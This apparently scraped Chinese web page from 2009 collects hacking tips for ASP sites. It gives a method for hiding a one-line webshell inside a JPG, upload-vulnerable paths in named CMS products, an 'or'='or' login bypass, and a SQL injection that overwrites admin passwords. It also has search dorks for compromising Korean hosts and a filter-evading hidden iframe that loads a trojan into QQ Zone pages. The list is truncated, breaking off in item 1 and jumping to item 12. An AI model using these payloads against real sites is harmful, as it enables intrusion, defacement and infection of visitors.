菜鸟是如何变成ASP木马高手的!

  发布时间:2009-06-09 11:28:18   作者:佚名   我要评论
1.名称:如何制作图片ASP木马   建一个asp文件,内容为<!--#i nclude file="ating.jpg"-->   找一个正常图片ating.jpg,插入一句话木马(比如冰狐的),用ultraedit进行hex编译,插入图片里,为了运行成功,还要搜索<%和%>,将其变为00,(不要替

12. 动画名称:媒体中国整站程序存在多处漏洞

  漏洞程序:媒体中国整站程序(第一版)

  官方网站:http://meiti.elgod.com/

  漏洞: %5c(暴库) 上传 注入

  上传页面:down1/upload.asp

  13. 名称:免费电话+MSH命令行工具

  http://www.globe7.com/ 打开主页,点击坐下角,Free DownLoad,下载到本地,安装,

  运行后,会提示正在寻找你所在地区的区号。由于是国际长途,注册一个帐号,送100美分,国内计时0.01/分,你就有100分钟可以白打。是一个帐号哦。

  要注意的就是,固定电话,小灵通 形式为0086521123456 521本来时0521,要省略前面的零,手机号也是一样。

  14. 名称:Bo-Blog的新漏洞

  http://网址/index.php?job=../admin/ban

  把其中"禁止搜索的词"那部分<table>另存出来,里面的地址改完整,插入一句话木马

  15. 名称:钩魂者入侵传奇私服

  用百度 搜索 传奇 inurl:tuku

  或者 传奇 inurl:wplm.htm

  再或者 传奇 inurlsites.asp

  友情链接里插入一句话木马即可

  16. 程序: 宏达企业整站上传漏洞

  官方主页:http://www.mu126.com/

  漏洞页面:/cx/upfile.asp (上传漏洞)

  17.无间盗邮箱,在修改密码里,用户名和密码里添'or'='or'

  18.名称: bbsxp5.16后台得到webshell

  bbsxp5.16过滤了 asp,asp,cdx,cer,扩展名的文件上传,就是在基本设置上添加上上传类型也不行,并禁止了修改数据备份数据名称,我们可以把此网页保存在本地,改源代码上传。

  19.名称:JHACKJ 2005年最新精典教程

  下载看看吧,不错,各大网站都有

  20.名称:省力入侵韩国肉鸡

  在啊D的扫描注入点项,打开这个:http://www.google.co.kr/advanced_search?hl=zh-CN

  这是高级搜索项,关键字随便写。这里我写asp?name= 设置为每页显示100条。

  语种选择韩文。搜索,很多sa.

  21.名称:任何网吧的管理系统破解

  选智能ABC,然后vv输入,光标后退两步,按delete键 刚输入的两个vv删除, 最后按Inter键

  22.名称:破解QQ空间插入网页木马的代码

  现在腾讯 已经封了很多QQ空间代码了 就如 以前 <iframe src="木马地址" name="lcx" width="0" height="0" frameborder="0"></iframe>插入网页木马的代码也早被封了

  突破禁用的方法 代码如下:

  <div id=DI><img src="javascript :DI.innerHTML=\'<iframe src=木马地址 width=190 height=190 marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no></iframe>\'" style=display:none></div>

  最后附上总结的

  1.上传漏洞[不多讲]

  pS: 如果看到:选择你要上传的文件 [重新上传]或者出现"请登陆后使用",80%就有漏洞了!

  有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用DOMAIN上传.

  2.注入漏洞[不多讲]

  pS:对MD5密码.有时我们不是哪么容易跑出来.如果是[SQL数据库].那么我们可以用以下命令:

  http://注入网址;update admin set password=\'新MD5密码\' where password=\'旧MD5密码\'-- [admin为表名.]

相关文章

  • 教你成为ASP木马高手

    1.名称:如何制作图片ASP木马 (可显示图片) 建一个asp文件,内容为<!--#i nclude file="ating.jpg"--> 找一个正常图片ating.jpg,插入一句话木
    2008-10-08
  • 4种最流行的木马捆绑器技巧

    一、传统的捆绑器   这种原理很简单,也是目前用的最多的一种。就是将B.exe附加到A.exe的末尾。这样当A.exe被执行的时候,B.exe也跟着执行了。这种捆绑器的代码是满
    2008-10-08
  • 木马免杀绝招以及常用的修改方法

    常用的木马免杀方法绝招一:快速搞定瑞星文件查杀操作步骤: 第一步:用OD载入,来到程序的入口点。  ...常用的木马免杀方法 绝招一:快速搞定瑞星文件查杀 操作步骤:
    2009-03-07
  • Asp脚本木马技术

    现在很多的站点,为便于建站和后台管理,都使用ASP动态程序。但这也为整个站点的安全带来很大隐患,现在典型的网站攻击就是通过植入ASP木马,从而得到系统的控制权。早期的
    2008-10-08
  • 常见的木马所有隐藏启动方式总结

    木马的最大的特点之一就是它一定是要和系统一起启动而启动,否则它就完全失去了意义!下面为大家介绍一下它的几种隐藏启动的方法:   方法一:注册表启动项:这个大
    2008-10-08
  • 黑客必懂的木马连接原理

    目前常见的木马有三种 正向连接木马 反弹连接木马 收信木马   正向连接木马,所谓正向,就是在中马者在机器上开个端口,而我们去连接他的端口。而我们要知道他的IP,才
    2008-10-08
  • 菜鸟必懂的木马连接原理

    目前常见的木马有三种 正向连接木马 反弹连接木马 收信木马   正向连接木马,所谓正向,就是在中马者在机器上开个端口,而我们去连接他的端口。而我们要知道他的IP,才
    2008-10-08
  • 几招帮你识别和防御Web网页木马

    常见的网页木马攻击手段有哪些?用户应该如何识别及防御来自网页木马的攻击?笔者将在本文为用户细细道来:
    2015-09-21
  • 什么是恶意网站?详解2016最新的钓鱼、黑客入侵、木马病毒教程

    大家都知道恶意网站在我们平时上网的时候并不少见,最常见的就是扎起我们登录qq和百度网页中见到的一些,现在小编就为大家讲解2016年最新黑客入侵教程
    2016-08-24
  • 如何手工查找后门木马?手工查木马教程

    现在大多数电脑技术人开始学习防范技术了,因为现在防范技术比攻击技术要重要,下面就一起来看看如何手工查找后门木马吧
    2016-08-24

最新评论